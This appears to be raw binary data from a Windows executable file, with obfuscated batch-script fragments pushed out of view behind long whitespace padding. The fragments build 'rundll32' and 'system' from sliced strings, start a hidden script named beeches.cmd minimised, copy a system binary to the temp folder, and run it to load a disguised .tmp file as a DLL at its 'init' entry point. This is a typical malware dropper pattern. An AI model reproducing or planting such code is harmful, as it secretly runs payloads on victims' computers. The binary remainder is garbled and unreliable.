5-565;5E5O5Y5j55�5�5�5�5�5�56'6B6�6�6�6�6�6�6�6�6�6�6�6�6�6�6)7.787B7L7]7r77�7�7�7�7�7�7�7�7�7�7�7�788)8/858n8s8}8�8�8�8�8�8�8�8�89(9/9�9�9�9�9�9�9�9�9::::,:1:F:[:j:o:�:�:�:�:�:�:);.;3;y;;�;�;�;�;�;�;�;�;�;�;�;#<(<e<r<w<�<�<�<�<�<�<�<�<k=}=�=�=�=�=�=�=�=�=�=
>>>+>1>8>I>W>\>a>f>�>�>�>�>�>�>�>.?<?A?F?K?�?�?�?�?�?�? �  x  000&000=0�0�0�0�0�01
1111&1/141>1D1M1R1\1c1�1�1�1�1�1�122+2;2K2[2k2{2�2�2�2�2�2�2�2�233+3;3K3[3k3{3�3�3�3�3�3�3�3�344+4�5�5�5	66)696I6Y6i6y6�6�6�6�6�6�6�6�6	77)7E8Y8u8z8�8�8�8�8�8�8�899(989H9X9h9x9�9�9�9�9�9�9�9�9::(:8:H:X:h:x:�:�:�:�:�:�:�:�:�<�<�<�<�<�<�<'=,=B=H=V=[=b=l=y=�=�=�=�=�=�=> >B>U>e>u>�>�>�>�>�>�>�>�>??%?5?E?U?e?u?�?�?�?�?�?�?�?�?   �  H  00%050E0U0e0�12C2H2�2�2�23-343^3l3q3}3�3 44 404@4P4`4p4�4�4�4�4�4�4�46/6?6O6_6�6�6�6�6�6�6�6�6�6�67&7C7T7Y7^7c7�7�7�7�7�78!8L8[8a8�8�8�8�8�8�8�8�8�8�8�8,9z9�9�9�9�9�9�9�9�9
::*:::J:Z:j:z:�:�:�:�:�:�:�:�:
;;Z<s<x<�<�<�<�<�<�<�<�<�<�<�<�<�<�<@=P=`=p=�=�=�=�=�=D>I>S>X>b>q>v>{>�>�>???/?l?r?�?�?�?�?�?�?�?�?�?   �  �  t0{0�0�0�0�0�0�0�0�011%1.1<1A1F1K1�1�1�1
22*2:2J2Z2j2z2�2�2�2�2�2�2�2�2
33*3:3J3Z3j3z3�3�3�4�4�4�45_5q5�5�5�5�5�5�5�5�5�5�5�5�5�56)646B6R6g6l6q6v6{6�6�6777,7;7_7m7r7�7�7�7�7^8k8p8u8z8�8�8�8�8�8�8�8�8�89949>9O9T9i9�9�9�9�9�9�9::!:1:A:�:;%;*;/;;�;�;�;�;�;�;�;�;�;-<c<h<m<s<y<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<'=7=G=W=g=w=�=�=�=�=�=�=�=�=>>'>7>G>W>g>w>�>�>�?�?�?�? �  H  00&060F0V0f0v0�0�0�0J1[1`1e1�1�1R2b2r2�2�2�2�2�2�2N3\3a3f3k3�3�3�344.4>4N4^4n4~4�4�4�4�4�4�4�4�455.5>5N5^5n5�6�6�6�6�67!7;7Q7�7�7�7�7�7�7�7D8U8Z8_8d8�8�8�8�8�8�8�869H9P9l9�9�9�9�9�9::+:0:�:�:�:�:�:�:;;.;>;�;�;�;�;�;�;<#<S<]<b<�<�<�<�<�<�<�<�<�<=&=F=Y=^=c=h=m=�=�=�=�=
>>->=>M>]>m>}>�>�>�>�>�>�>�>�>??-?       0020G0X0]0r0�0�01!1<1K1P1U1z1�1�1�1�1"2A2\2w2�2�2�2�23�3[4{4�4�455+51575=5C5I5O5d5y5�5�5�5�5
66?6Q6�6�6Q7�7�7�788*8/8<8~8�8�8�8�8�89i9{9::w:�:�:�:�:;;�;�;�;<<< <5<><m<v<<�<�<�<�<�<�<�=�=�=�=>>\>k>t>�>�>�>�>�>�>�>�>�>"?*?/?B?V?[?n?�?�?�?�?�?�?�?�?�?�?�?�?�?�?  l   0
0000'0/070C0L0Q0W0a0k0{0�0�0�0c1�1232{2�2�23�3�3�5�5�5�5�7�7�7�7�7�7�7&8k8p8t8x8|8;(;�;B<     \   �0�;�;�;<<<<<<<<#<'<+</<3<7<;<?<C<G<K<O<S<W<[<_<c<g<k<o<s<�=�>�>�>�>�> ?1?�? 0 D   1D1Y1s1�1�1�1�1�12"2,262D2_2p2|2�2�2�3�5+8�8;P;h;n;�;Y=�= @ �    00/0K0k0y0�0�0�0�0�1�12,2=2I2X2p2�2�2�2�2�2�23!3*3/343O3Y3e3j3o3�3�3�3�3�3�3�3�3�3�3	4414s4�4�4�4�445C5\5�5�5�6�6�6�6j7�7�7�7�78
8H8`8�8�8�8P;�;= P P   �1�1�1�1P2X2H3P3�3�3�3�4�4�4�4�4�4�4�4�4�45
55*5/545�:r;z;�;�;�=�=>> `     C1�5�8�8�8�8�;�=�=�=�=   p    a1   � x   5<7H7X7d7�7�7�7�788�8�9�9�9
::�;�;�;$<1<@<U<b<x<<�<�<�<�<�<�<=#=�=�=�=�=A>O>h>p>y>�>�>�>�>�>:?I?R?`?�?�?   � �   002<2C2x3�3�3�3�3�3�3�3V4�4�4�4r5�5?6J6�6�6�67^7i7q7|7�7�7�7�7�7�7�7�7�78?8X8]8�8�8�8�8�8979�9�9�:;8;r;�;6<L<�<�=�=�=>">)>H>v>�>�>�>�>�>�>?2?B?O?s?z?�?�?�?�?�? �    0$0E0l0�0�0�0�0�0�0�0
1#1(111x1�12�2�2�2�2�233;3k3�3�3�3x6~6�6�6�6`7k7p7u7�7�7�7�7�7�7�7�7�788$8:8M8n8{8�8�8�8�8�899949X9l9q9v9�9�9�9�9�9�9�9�9�9�9::):.:3:Q:`:k:p:u:�:�:�:;';>;G;^;p;|;�;�;�;)<7<I<T<z<�<�<�<�<�<�< ===*===\=�=�=�=�=�=>1>S>w>�>�>�> ??? ?&?A?H?�?�?   � x   Z0�0�2�3�4�45@5�6+7�7�7�7)8�8�8�89 9'9.9H9W9a9n9x9�9�9�9:<:�<�<�<==_=�=�=�=�=�=�=�=�=�=�=>=>g>�>1?^?�?�?   � �   v0{0�0�0;1�1�1�12�2�2�2�2�2363p3�3�3�34p4�4�4�4515O5Z5�5�5�5�5�5,61666;6D677n7w7�7�7�758=8U8c8k8�8�8969;9B;\;k;y;�;�;�;�;�;�;�;<&<4<B<M<c<w<�<�=�=>k>C?�?�? � �   0j0�0�0�0\1�1�1�1�1�1�1�122)2;2M2_2�2�2�2�2�2�3�4�67*7S7~7�7�7�7�7�788$898^8�8�8.9y9�9�9V:�:f;�;�;�;�<�<==%=6=�=�=)>4>F>l>?�?   � �   50�01L1�122r2*505�5�586R6�6�6�6�6�67
7&7-7D7Z7�7�7�7 818d8y8�8�8
9U9d9�9�9:Q:�:�:<U<�<�<�<�<z=�=�=�=�=>6>�>�>�>?�?�?�?�?   � d   �0�0�041Q1q1i2�2n3x3�34'4.4E4[4h4m4{45"5(78X8e8�8�8R:�:�:�:;8;C;P;b;�;�;G<\<e<n<�<�<�<�>   �    0010G0O0A4G5w5$666H6�6�6�677 717I7O7[7z7�7�7�7K8a8�89!9<9�9�9�9�9�9::�:�:�:�:�:�: ;J;R;o;;�;�;�<�< =W=t=�=�=�=�>  t   �0�0;1�1�1�2�23+3?3E34B4&6�6�6�6�6707j;�;�;F<c<�<�<�<�<==$=4=D=T=d=t=�=�=�=�=�=�=�=�=>>$>4>D>T>d>t>     D   0000000 0$0(0,0004080<0@0D0H0L0P0T0X0\0h0l0p0|0�0�0   � h   P2�2�2�233(3@3L3P3T3p3t3X9\9`9d9h9l9p9t9x9|9�9�9�9�9�9�9�9�9�:�:;0;P;p;�;�;<<<0<4<8<<<@<D<     l9p9t9x9|9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9 :::: :(:0:8:@:H:P:X:`:h:p:x:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�: ;;;; ;(;0;8;@;H;P;X;`;h;p;x;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�; <<<< <(<0<8<@<H<P<X<`<h<p<x<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�< ==== =(=0=8=@=H=P=       x3|3�3       h1p1x1|1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1 22222222 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2 33333333 3$3(3,3034383<3@3D3H3>>>> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\> 0   �;�;�;�;�;�;<<<<$<,<4<<<D<L<T<\<d<l<t<|<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<====$=,=4=<=D=L=T=\=d=l=t=|=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=>>>>$>,>4><>D>L>T>\>d>l>t>|>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>????$?,?4?<?D?L?T?\?d?l?t?|?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�? @ �  0000$0,040<0D0L0T0\0d0l0t0|0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�01111$1,141<1D1L1T1\1d1l1t1|1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�12222$2,242<2D2L2T2\2d2l2t2|2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�233== =(=0=8=@=H=P=X=`=h=p=x=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�= >>>> >(>0>8>@>H>P>X>`>h>p>x>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�> ???? ?(?0?8?@?H?P?X?`?h?p?x?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�? P P   0000 0(00080@0H0P0X0`0h0p0x0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0 1111 1(10181@1H1P1X1`1h1p1x1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1 2222 2(20282@2H2P2X2`2h2p2x2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2 3333 3(30383@3H3P3X3`3h3p3x3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3 4444 4(4>>>$>,>4><>D>L>T>\>d>l>t>|>�>�>�>�>�>�>�>�>�>�>�>�>�>�>   ` �   
1111�9�9�9(:@:�:�:�:�:�:�:�:�:�:�:�:�:; ;$;4;8;<;@;H;`;p;t;�;�;�;�;�;�;�;�;�;�;�;�;�;<< <$<(<,<4<L<\<`<p<t<|<�<�<�<�<�<�<�<�<|=�=�=�=�= >>>>>,>4>H>P>d>l>x>�>�>�>�>�>�> ????$?D?L?T?\?d?l?t?|?�?�?�?�?�?�?�?�?�?�?�?�? p l   0000 0(00080@0H0P0X0`0h0p0x0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0 1111 1(10181@1H1P1X1`1h1p1x1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1 2222 2(20282@2H2P2X2`2h2p2x2�2�2�2�2�2�2�2�2�2�23343<3D3H3P3d3l3t3|3�3�3�3�3�3�3�3�3�3�3�3�3�3484D4\4`4|4�4�4�4�4�4�4�4�4555D5H5d5h5p5x5�5�5�5�5�5�5�566(60686D6d6p6�6�6�6�67(7H7h7�7�7�7�78(8H8h8�8�8�8�89(9H9d9h9   �    x1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          set bedfellowsHeard=%windir%
set sampleReconstituting=%bedfellowsHeard%\\%132\\%2r32.exe
set oracularlySlovenly=%temp%
set pilafChoking=replace

:: photocopiedImpeding
%pilafChoking% %sampleReconstituting% %oracularlySlovenly% /A
call %2l32 sandstone\\kilketh.tmp,init

exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   set prickingRots=dantrundlysystems
set donateRid=%prickingRots:~4,5%
set aguesCaravan=%prickingRots:~10,6%

start /min sandstone\beeches.cmd %aguesCaravan% %donateRid%
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  